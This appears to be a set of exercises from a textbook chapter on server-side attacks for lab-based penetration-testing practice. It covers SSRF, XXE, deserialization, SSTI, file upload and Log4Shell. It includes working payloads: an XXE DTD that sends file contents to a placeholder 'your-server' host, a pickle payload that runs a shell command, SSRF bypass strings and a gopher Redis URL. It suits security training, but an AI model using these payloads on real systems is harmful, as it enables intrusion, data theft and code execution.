Chapter 22 Exercises: Server-Side Attacks

⚠️ Important: Server-side attacks can cause system instability or denial of service. Always perform these exercises in your isolated lab environment. Never test deserialization or RCE payloads against production systems.

Exercise 1: SSRF Discovery and Exploitation (Intermediate)

Objective: Identify and exploit an SSRF vulnerability in ShopStack's image import feature.

Instructions: 1. Identify all ShopStack endpoints that accept URL parameters (image import, PDF generation, webhook configuration, URL preview) 2. For each endpoint, test with: - http://127.0.0.1/ (localhost) - http://169.254.169.254/latest/meta-data/ (AWS metadata) - http://metadata.google.internal/ (GCP metadata) - A Burp Collaborator or interactsh URL (OOB detection) 3. Document which endpoints are vulnerable and what data is returned 4. Attempt to access internal services through the SSRF

Deliverable: An SSRF assessment report documenting each tested endpoint, the type of SSRF (full read vs. blind), and the achievable impact.

Exercise 2: SSRF Filter Bypass (Advanced)

Objective: Bypass ShopStack's SSRF protections using various encoding and DNS techniques.

Instructions: 1. Confirm that basic SSRF payloads (http://127.0.0.1) are blocked 2. Systematically test bypass techniques: - IP encoding: decimal (2130706433), hex (0x7f000001), octal (0177.0.0.1) - Short forms: http://127.1/, http://0/ - IPv6: http://[::1]/, http://[::ffff:127.0.0.1]/ - DNS rebinding: Use a rebinding service - URL parsing confusion: http://attacker@127.0.0.1/ - Protocol smuggling: gopher://, file://, dict:// 3. For each successful bypass, document the exact payload used

Deliverable: A bypass matrix showing which encoding techniques defeat which filter types, with working payloads.

Exercise 3: XXE File Disclosure (Intermediate)

Objective: Exploit XXE vulnerabilities in ShopStack's XML processing endpoints.

Instructions: 1. Identify all XML processing endpoints in ShopStack (product import, SAML, SOAP) 2. Craft a basic XXE payload to read /etc/passwd (Linux) or C:\Windows\System32\drivers\etc\hosts (Windows) 3. If basic XXE works, escalate to reading application configuration files 4. Test XXE through file upload vectors (SVG, XLSX, DOCX) 5. If inline XXE fails, attempt blind XXE with out-of-band exfiltration

Deliverable: A complete XXE assessment documenting each processing endpoint, successful payloads, and exfiltrated data.

Exercise 4: Blind XXE Exfiltration (Advanced)

Objective: Exfiltrate data from ShopStack when XXE responses are not reflected.

Instructions: 1. Set up an attacker-controlled web server (Python SimpleHTTPServer or Apache) 2. Create a malicious DTD file on your server: xml <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % combined "<!ENTITY &#x25; exfil SYSTEM 'http://your-server/?data=%file;'>"> %combined; 3. Craft an XXE payload that loads your external DTD 4. Monitor your web server logs for the exfiltrated data 5. Attempt to exfiltrate multi-line files (note the challenges with special characters)

Deliverable: A working OOB XXE exfiltration setup with documented steps and captured data.

Exercise 5: XXE Demo Application (Intermediate)

Objective: Build a vulnerable Flask application demonstrating XXE and its mitigation.

Instructions: 1. Create a Flask application that accepts XML product data 2. Implement a vulnerable XML parser that processes external entities 3. Demonstrate successful XXE exploitation against your application 4. Implement the fix using defusedxml or by disabling external entities 5. Verify that the fix prevents exploitation 6. Use the provided example-02-xxe-demo.py as a starting point

Deliverable: A working Flask application with both vulnerable and patched versions, with a writeup explaining the vulnerability and fix.

Exercise 6: Java Deserialization Detection (Advanced)

Objective: Identify and test Java deserialization vulnerabilities in ShopStack's legacy components.

Instructions: 1. Search ShopStack for indicators of Java serialization: - Cookies containing rO0AB (Base64 Java serialized data) - Custom headers with binary data - ViewState in JSP pages - Content-Type: application/x-java-serialized-object 2. Generate a URLDNS detection payload using ysoserial: bash java -jar ysoserial.jar URLDNS "http://unique-id.interact.sh" | base64 3. Submit the payload through identified deserialization points 4. Monitor for DNS callbacks confirming deserialization 5. If confirmed, test exploitation payloads (in lab only)

Deliverable: A deserialization assessment documenting all identified serialization points, detection results, and applicable gadget chains.

Exercise 7: Python Pickle Exploitation (Intermediate)

Objective: Exploit insecure Python pickle deserialization in a lab application.

Instructions: 1. Create a simple Flask application that uses pickle to deserialize session data 2. Craft a malicious pickle payload that executes a command: python import pickle, os class Exploit: def __reduce__(self): return (os.system, ('id > /tmp/pwned.txt',)) payload = pickle.dumps(Exploit()) 3. Submit the payload to your vulnerable application 4. Verify command execution 5. Implement a secure alternative using JSON or signed pickle

Deliverable: A working lab demonstrating pickle exploitation with both vulnerable and secure code versions.

Exercise 8: SSTI Detection and Exploitation (Intermediate)

Objective: Detect and exploit Server-Side Template Injection in ShopStack.

Instructions: 1. Identify input fields in ShopStack where user content is rendered server-side (email templates, product descriptions, custom pages) 2. Test for SSTI using mathematical expressions: {{7*7}}, ${7*7}, <%= 7*7 %> 3. If SSTI is confirmed, determine the template engine by testing engine-specific payloads 4. Attempt to escalate from template evaluation to operating system command execution 5. Use tplmap for automated detection and exploitation

Deliverable: An SSTI assessment documenting the injection point, template engine, exploitation chain, and achieved access level.

Exercise 9: File Upload Bypass (Intermediate)

Objective: Bypass ShopStack's file upload restrictions to achieve code execution.

Instructions: 1. Identify all file upload endpoints in ShopStack 2. Attempt to upload a PHP/Python/Node.js web shell 3. If blocked, try these bypass techniques in order: - Extension variations (.php5, .phtml, .php.jpg) - Content-Type manipulation - Magic bytes prepending (create a polyglot file) - Case variation (.PhP) - Null byte injection (.php%00.jpg) - .htaccess upload (for Apache) 4. If uploaded, locate the file and test for execution 5. Document each bypass attempt and the application's response

Deliverable: A file upload bypass matrix documenting which techniques succeed and which are blocked.

Exercise 10: SSRF Detector Tool Development (Advanced)

Objective: Build a Python tool that automates SSRF detection across an application.

Instructions: 1. Write a Python tool that: - Accepts a list of URLs/endpoints with parameters - Tests each parameter for SSRF using callback-based detection - Tests common SSRF payloads (localhost, metadata services, internal ranges) - Supports both GET and POST parameters - Integrates with interactsh or a custom callback server for blind detection - Reports findings with severity ratings 2. Use the provided example-01-ssrf-detector.py as a starting point

Deliverable: A working SSRF detection tool with documentation and example output.

Exercise 11: Log4Shell Lab (Advanced)

Objective: Set up a Log4Shell lab and practice exploitation.

Instructions: 1. Deploy the vulnerable Log4j application from Section 22.10 2. Set up a JNDI exploitation server (using marshalsec) 3. Host a malicious Java class that creates a proof file 4. Test injection through various HTTP fields (User-Agent, headers, parameters) 5. Verify code execution by checking for the proof file 6. Test WAF bypass techniques from Section 22.6.3 7. Apply the patch (upgrade to Log4j 2.17.1) and verify the fix

Deliverable: A Log4Shell lab report documenting the complete attack chain, bypass techniques tested, and verification of the fix.

Exercise 12: Attack Chain Development (Advanced)

Objective: Chain multiple server-side vulnerabilities for maximum impact.

Instructions: 1. In your ShopStack lab environment, identify at least two server-side vulnerabilities from different categories (SSRF, XXE, deserialization, SSTI, file upload) 2. Develop an attack chain that combines these vulnerabilities: - Example: SSRF to discover an internal service, then exploit a deserialization flaw in that service - Example: XXE for file disclosure to find credentials, then use those credentials for lateral movement 3. Document each step of the chain with exact commands and payloads 4. Calculate the combined CVSS score for the chain

Deliverable: An attack chain report documenting the step-by-step escalation path with all payloads and evidence.

Exercise 13: Server-Side Vulnerability Scanner (Advanced)

Objective: Develop an automated scanner for common server-side vulnerabilities.

Instructions: 1. Write a Python script that tests a target URL for: - SSRF: Test URL parameters with callback payloads - XXE: Test XML endpoints with entity injection - SSTI: Test input fields with template expressions - File upload: Test upload endpoints with various file types 2. The scanner should: - Accept a target URL and optional authentication credentials - Generate a structured report of findings - Rate-limit requests to avoid causing denial of service - Support both active and passive detection modes

Deliverable: A working scanner tool with documentation, example output, and a discussion of false positive/negative rates.

Exercise 14: MedSecure Server-Side Assessment (Intermediate)

Objective: Assess MedSecure's server-side security with healthcare-specific considerations.

Instructions: 1. Test MedSecure's clinical document upload for XXE (CDA documents are XML-based) 2. Test MedSecure's medical device integration endpoints for SSRF 3. Test MedSecure's report generation for SSTI 4. Test MedSecure's DICOM image processing for deserialization flaws 5. For each finding, assess the healthcare-specific impact (PHI exposure, patient safety, regulatory compliance)

Deliverable: A healthcare-focused server-side assessment report with HIPAA impact analysis.

Exercise 15: Protocol Smuggling via SSRF (Advanced)

Objective: Use SSRF with the gopher protocol to interact with internal services.

Instructions: 1. In your lab environment, deploy a Redis instance accessible only from the ShopStack server 2. Exploit ShopStack's SSRF vulnerability using the gopher protocol to send Redis commands: gopher://redis.internal:6379/_SET%20pwned%20true%0D%0A 3. Demonstrate reading and writing data in Redis through SSRF 4. Attempt to use Redis SLAVEOF or MODULE LOAD for further exploitation 5. Document the complete attack chain from SSRF to data manipulation

Deliverable: A protocol smuggling report demonstrating Redis exploitation through SSRF with exact gopher URLs used.

Exercise 16: Deserialization Gadget Chain Research (Advanced)

Objective: Understand how deserialization gadget chains work by analyzing an existing chain.

Instructions: 1. Choose one ysoserial gadget chain (e.g., CommonsCollections1) 2. Research and document each class in the chain 3. Draw a diagram showing how each class calls the next 4. Explain how the final class achieves code execution 5. Identify what library/version must be present on the classpath 6. Discuss how class allowlisting would prevent this specific chain

Deliverable: A technical analysis of the gadget chain with a class-by-class walkthrough and a dependency diagram.

Exercise 17: Secure Code Review for Server-Side Vulnerabilities (Intermediate)

Objective: Review code samples for server-side vulnerability patterns.

Instructions: Review the following code snippets and identify all server-side vulnerabilities. For each vulnerability, explain the risk and provide the corrected code.

  1. Python URL fetch function
  2. Java XML parser configuration
  3. PHP deserialization of user input
  4. Node.js template rendering
  5. Python file upload handler
  6. Java logging with user input

(Code snippets are provided in the exercise-solutions.py file for reference)

Deliverable: A code review report with identified vulnerabilities, risk assessments, and corrected code for each snippet.

Return to Chapter 22: Server-Side Attacks